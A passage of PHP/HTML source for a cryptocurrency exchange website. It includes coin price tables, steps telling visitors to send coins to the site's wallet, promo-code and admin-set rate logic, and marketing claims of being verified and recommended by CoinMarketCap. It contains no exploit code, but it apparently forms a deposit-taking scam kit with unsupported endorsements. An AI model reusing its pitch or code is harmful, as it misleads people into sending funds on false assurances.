1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td><img src="https://s3.coinmarketcap.com/generated/sparklines/web/7d/2781/1839.svg" alt=""> </td> </tr> <tr> <td class="tableName"> <div class=""> <p>3</p> </div> <div class=""> <img src="assets/coins/ETH.svg" alt=""> </div> <div class=""> <p>Ethereum</p> </div> </td> <td id="ETHhypedPrice"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td id="ETHhypedPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td><img src="https://s3.coinmarketcap.com/generated/sparklines/web/7d/2781/1027.svg" alt=""> </td> </tr> <tr> <td class="tableName"> <div class=""> <p>4</p> </div> <div class=""> <img src="assets/coins/TRX.svg" alt=""> </div> <div class=""> <p>Tron</p> </div> </td> <td id="TRXhypedPrice"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td id="TRXhypedPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td><img src="https://s3.coinmarketcap.com/generated/sparklines/web/7d/2781/1958.svg" alt=""> </td> </tr> <tr> <td class="tableName"> <div class=""> <p>5</p> </div> <div class=""> <img src="assets/coins/SOL.svg" alt=""> </div> <div class=""> <p>Solana</p> </div> </td> <td id="SOLhypedPrice"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td id="SOLhypedPercentage"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-hourglass-split" viewBox="0 0 16 16"> <path d="M2.5 15a.5.5 0 1 1 0-1h1v-1a4.5 4.5 0 0 1 2.557-4.06c.29-.139.443-.377.443-.59v-.7c0-.213-.154-.451-.443-.59A4.5 4.5 0 0 1 3.5 3V2h-1a.5.5 0 0 1 0-1h11a.5.5 0 0 1 0 1h-1v1a4.5 4.5 0 0 1-2.557 4.06c-.29.139-.443.377-.443.59v.7c0 .213.154.451.443.59A4.5 4.5 0 0 1 12.5 13v1h1a.5.5 0 0 1 0 1h-11zm2-13v1c0 .537.12 1.045.337 1.5h6.326c.216-.455.337-.963.337-1.5V2h-7zm3 6.35c0 .701-.478 1.236-1.011 1.492A3.5 3.5 0 0 0 4.5 13s.866-1.299 3-1.48V8.35zm1 0v3.17c2.134.181 3 1.48 3 1.48a3.5 3.5 0 0 0-1.989-3.158C8.978 9.586 8.5 9.052 8.5 8.351z"/> </svg> </td> <td><img src="https://s3.coinmarketcap.com/generated/sparklines/web/7d/2781/5426.svg" alt=""> </td> </tr> </table> </div> </section> <section class="howitsworks"> <div class="centering"> <div class="howtitlediv"> <p class="lng-how-works">How does it work?</p> </div> <div class="howdivs"> <div class=""> <div class="step-title-and-number"> <p class="stepnumber">1</p><p class="lng-choose-crypto step_title">Choose crypto</p> </div> <div class="step-description"> <p class="lng-choose-crypto-description">Choose the pair of crypto you want to exchange.</p> </div> </div> <div class=""> <div class="step-title-and-number"> <p class="stepnumber">2</p><p class="lng-send-coins step_title">Send coins</p> </div> <div class="step-description"> <p class="lng-send-coins-description">Send your coins to out wallet and wait for yours to be sent.</p> </div> </div> <div class="lastStep"> <div class="step-title-and-number"> <p class="stepnumber">3</p><p class="lng-receive-founds step_title">Receive your funds</p> </div> <div class="lng-receive-founds-description step-description"> <p>After all the confirmations receive your funds instantly to any wallet you linked.</p> </div> </div> </div> </div> </section> <section class="quality"> <div class="centering textwithphone"> <div class="phText"> <div class="lineZtext"> <p class="lng-highest-quality title">Highest quality for you!</p> <img src="assets/lineZ.svg" alt=""> </div> <p class="lng-highest-quality-description description">Our system is fully automated, so you won’t face any delays from our side.</p> <div class="quality_btns"> <button class="lng-proceed started" type="button" name="button">Proceed to exchange</button> </div> <p class="lng-highest-quality-description2 description">Our new platform allows you to buy, exchange and hold cryptocurrency on our website! We have the best coursing and lowest fee to receive from our clients!</p> </div> <div class="phones"> <img id="dekstopPhone" class="dekstopPhone" src="assets/phones.svg" alt=""> <img id="mobilePhone" class="mobilePhone" src="assets/mobile-phone.svg" alt=""> </div> </div> <marquee scrollamount="10" class="marqueeP">LOWEST FREE | ASSETS TO EXCHANGE | HUGE AMOUNT RESERVED | 0 DELAY TIME | LOWEST TRANSCATION FREE EVER </marquee> </section> <section class="recomended"> <div class="centering"> <div class=""> <p class="lng-new-safe-best recomended_title"> New, safe & best! </p> <p class="lng-new-safe-best-description recomended_description"> Our platform is verified and recommended by CoinMarketCap. We also work with other big companies connected to the crypto-world! </p> <img src="assets/recomended_icons.svg" alt=""> </div> <div class="recomended_img_div"> <img src="assets/recomended_bg.svg" alt=""> </div> </div> </section> <footer id="help"> <div class="centering questionsD"> <p class="lng-any-questions questions">Any questions?</p> </div> <div class="centering"> <div class=""> <ul> <li><a class="lng-about li-a" href="#">About</a></li> <li><a class="lng-features2 li-a" href="#marketTrend">Features</a></li> <li><a class="lng-pricing li-a" href="#exchange_section">Pricing</a></li> <li><a class="lng-news li-a" href="#marketTrend">News</a></li> <?php echo '<li><a class="lng-help li-a" href="'.$supportTG.'">Help</a></li>'; ?> <?php echo '<li><a class="lng-contact li-a" href="'.$supportTG.'">Contact</a></li>'; ?> </ul> <p class="sfname">© 2018 - 2023 <?php echo $site_name; ?></p> </div> <div class="f-r"> <?php echo '<a class="lng-contact-support tgsup" href="'.$supportTG.'">Contact support</a>'; ?> <p class="lng-answering support_description">Answering within a minute!</p> </div> </div> <div class="centering"> <div class=""> <?php echo "<a href='".$trustpilotLink."'>"; echo '<img src="assets/bestchange.svg" alt=""></a>' ?> </div> </div> </footer> </body> <script type="text/javascript"> function goToForm(){ document.getElementById("exchange_section").scrollIntoView(); } function goToHelp(){ document.getElementById("help").scrollIntoView(); } </script> <!-- dark-light mode --> <script type="text/javascript"> if(localStorage.getItem("darkMode")==1){ document.getElementById("dark-light-mode").src = "assets/light.svg"; localStorage.setItem("darkMode",1); var element = document.createElement("link"); element.setAttribute("rel", "stylesheet"); element.setAttribute("type", "text/css"); element.setAttribute("href", "styles/darkMode.css"); document.getElementsByTagName("head")[0].appendChild(element); document.getElementById("supported_assets_img").src = "assets/dark_bg_supported_coins.svg" document.getElementById("mobilePhone").src = "assets/mobile-dark-phone.svg" document.getElementById("dekstopPhone").src = "assets/dark-phones.svg" } else{ localStorage.setItem("darkMode",0); document.getElementById("dark-light-mode").src = "assets/dark.svg" } function changeMode(){ localStorage.setItem("darkMode", localStorage.getItem("darkMode")== 1 ? 0 : 1); location.reload(); } </script> <script src="scripts/Texts/textsMainPage.js" type="text/javascript"> </script> <script src="scripts/translate.js" type="text/javascript"> </script> <?php $query = $pdo->prepare("SELECT * FROM sitesettings"); $query->execute(); $result = $query; foreach ($result as $row) { echo '<script>'; echo 'var addPercentage = ' . $row['addPercentage'] . ';'; echo 'var percentage = ' . $row['percentage'] . ';'; echo 'var minAmount = ' . $row['min'] . ';'; echo 'var maxAmount = ' . $row['max'] . ';'; echo '</script>'; } ?> <script> <?php $query = $pdo->prepare("SELECT * FROM customCoins"); $query->execute(); $result = $query; echo "var customCoins = {"; foreach ($result as $row) { echo '"'. $row['coin'] . '":' . $row["rate"].','; } echo "}"; ?> </script> <script> localStorage.setItem("addPercentage", addPercentage); localStorage.setItem("percentage", percentage); localStorage.setItem("minAmount", minAmount); localStorage.setItem("maxAmount", maxAmount); var coinSend = "BTC"; var coinReceive = "ETH"; var sendUsd = 0; var receiveUsd = 0; var inputAmount = 0; var receiveAmount = 0; var bonus = 0; var sendCoinName = "BTC"; var receiveCoinName = "ETH"; var isFirstLoad = true; var usedPromo = ""; </script> <?php $query_pairs = $pdo->prepare("SELECT * FROM pairs"); $query_pairs->execute(); $result_pairs = $query_pairs; echo '<script>'; echo 'var pairs = {}; '; foreach ($result_pairs as $row) { echo "pairs['" . $row["pair"] . "'] = " . $row["percentage"] . ";"; } echo '</script>'; ?> <script src="scripts/config.js"></script> <script src="scripts/processing.js"></script> <script src="scripts/crypto-api.js"></script> <script src="scripts/main.js"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/forge/0.8.2/forge.all.min.js"></script> <?php $query_promocodes = $pdo->prepare("SELECT * FROM promocodes"); $query_promocodes->execute(); $result_promocodes = $query_promocodes; echo '<script>'; echo 'var promocodes = {}; '; foreach ($result_promocodes as $row) { echo "promocodes['" . hash('sha256', $row["code"]) . "'] = " . $row["percentage"] . ";"; } echo '</script>'; ?> <script src="scripts/promo.js"></script> <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script> <script type="text/javascript"> pageFirstLoad(); </script> </body> <script src="//code.jivo.ru/widget/mXEFmSvShC" async></script> </html>
| ver. 1.4 |
Github
|
.
| PHP 8.0.30 | Generation time: 0.06 |
proxy
|
phpinfo
|
Settings